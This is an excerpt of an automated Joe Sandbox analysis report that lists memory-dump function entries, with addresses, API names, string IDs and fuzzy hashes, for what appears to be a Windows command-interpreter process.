                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                          • Instruction ID: cc55a70b1ef88f189a443a5ee06ccb06b466f31c0abfcdd74b439412a4ceda93
                                                                                          • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                          • Instruction Fuzzy Hash: 9391B132A0A683A6EB648F35D8102FDB6A0FB89B85F054135DA4F87794EF3CD545E300
                                                                                          Function 00007FF6A0E7B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                          • String ID: DPATH
                                                                                          • API String ID: 3260997497-2010427443
                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                          • Instruction ID: a931180504682f90e8b58c9807a885b19972d4014bd5228a66f59704936a285d
                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                          • Instruction Fuzzy Hash: 67D1C232A0B683A2EB249B25D8502BD63A1FF85B94F544235DA1DC77E6DF3CE845E340
                                                                                          Function 00007FF6A0E87FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                          • String ID: @P
                                                                                          • API String ID: 1801357106-3670739982
                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                          • Instruction ID: a846b69672dd927ed994c481fdf7dc5f8e903dd6f6ac091100152cf21ecb5548
                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                          • Instruction Fuzzy Hash: 1B414E32B05A42EEE7108F70D4402EDA7B0FB89759F949231DA0D82B88DF78D508D740
                                                                                          Function 00007FF6A0E72220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                          • String ID:
                                                                                          • API String ID: 1034426908-0
                                                                                          • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                          • Instruction ID: 2c83b55237c779a99e1d0732320776a39781864c7c35da457077c81467b1ce50
                                                                                          • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                          • Instruction Fuzzy Hash: EFF1BE32B0A783AAEB64CF21D8402E967A4FF45788F444135DA5E8BB96DF3CE544E700
                                                                                          Function 00007FF6A0E9AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                          • API String ID: 4081037667-3301834661
                                                                                          • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                          • Instruction ID: a870c75418c8c78596414206db804b225a0010f17dca43491a0fa0b2b4d66606
                                                                                          • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                          • Instruction Fuzzy Hash: 71710771B0A783A2EB608B25E0502BAE3A1FF897C4F584131DE4E87794DF3CD595A740
                                                                                          Function 00007FF6A0E9AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AA85
                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AACF
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AAEC
                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB39
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB6F
                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABA4
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABCB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                          • String ID: %s=%s
                                                                                          • API String ID: 1019019434-1087296587
                                                                                          • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                          • Instruction ID: 160f205e95fdf698a8f2a8e1524f4e0e357153422cbb8617eea0da59251cdc91
                                                                                          • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                          • Instruction Fuzzy Hash: AE51D332B0A783A6E7608B25E4407BABAE1FF89780F548234DE4DC3795EF38D4559B00
                                                                                          Function 00007FF6A0E71884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                          • String ID: COPYCMD
                                                                                          • API String ID: 2429825313-3727491224
                                                                                          • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                          • Instruction ID: e6fd5db5d526517d8963abec1a7839d78c00a167086207b3b93dd10836f17a37
                                                                                          • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                          • Instruction Fuzzy Hash: C4F1BD32F0A753AAFB608FA490402BD72A1BB44B98F504275DE5EA37D5EF3CA455E340
                                                                                          Function 00007FF6A0E74A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4289998964-0
                                                                                          • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                          • Instruction ID: 31996360922461fed1ffc5e96bf9fd73a9729b9739caa87b56dc7ec1a9c6bab7
                                                                                          • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                          • Instruction Fuzzy Hash: 7BC1B171B0B35BA2EE949B529548779A3A0FB45BD0F005539CE0E87BD1EF3CE891A340
                                                                                          Function 00007FF6A0E9BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3476366620-0
                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                          • Instruction ID: 78da4045e0ed39af1115b8b3cef29eb6c444dbc9e20ddcfa0e53204b8fcf4155
                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                          • Instruction Fuzzy Hash: 1F212430D1BA43B6FA546B20E9153B8AB61FF8AB56F944635D55EC23E1DF3CA408E300
                                                                                          Function 00007FF6A0E89584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 4104442557-0
                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction ID: da337f146694d40f7d7b5ee8f168c45d44a5ef4284a76db0b27135cd516d3f6c
                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction Fuzzy Hash: F1115132A06B429BEB00DF70E8441A933B4FB5D759F500A30EA6D87B54EF7CD5A49340
                                                                                          Function 00007FF6A0E73D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                          • String ID: %9d
                                                                                          • API String ID: 1006866328-2241623522
                                                                                          • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                          • Instruction ID: 584314e8e6697c1001848f46849e834c573d0aa5fcb5bb617292585b91cd71d2
                                                                                          • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                          • Instruction Fuzzy Hash: 06516272A0A743AAE740CF21E8406A97BB4FB45794F408635DA2DD37A6DF3CE544EB40
                                                                                          Function 00007FF6A0E78DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                          • Instruction ID: 5d99bb03fa24f23f1c3eb004f67337d4875a5d925f797104a76df9fe28371f9c
                                                                                          • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                          • Instruction Fuzzy Hash: 34C1F132F0A787A6EB64CB20E990AB963A4FF95784F044135DA1D877A2DF3CE555A300
                                                                                          Function 00007FF6A0E79B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                          • Instruction ID: e97064ca92a99d9d25d82d0f8144d668bb9ce0c0e071ad0bd3cf7dfa0534990e
                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                          • Instruction Fuzzy Hash: 49A1C032A0A743A6EB64DB25A45167A62E5FF89B80F548135DE4EC7792DF3CE801E700
                                                                                          Function 00007FF6A0E9FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DiskFreeSpace
                                                                                          • String ID: %5lu
                                                                                          • API String ID: 2448137811-2100233843
                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                          • Instruction ID: 9efe89c224dbc9926b1a53b6ad6aba268187bec6cd7f6af01ec8e3a2e3b40a2a
                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                          • Instruction Fuzzy Hash: 1841A47270AAC6A5EB61DF21E8406EAB361FB84785F448035EE4D4B749DF7CD149D700
                                                                                          Function 00007FF6A0E7D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 2081463915-1994581435
                                                                                          • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                          • Instruction ID: b2723ad11d3a3c08bbdef750993e4688520610bdf7ee7dd5c0fc65c4f49a2f5b
                                                                                          • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                          • Instruction Fuzzy Hash: 6071CB31E0F683B5FBA4AB24A85427426E0BF59784F144939D91EC27E2DF3CB481A340
                                                                                          Function 00007FF6A0E781D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
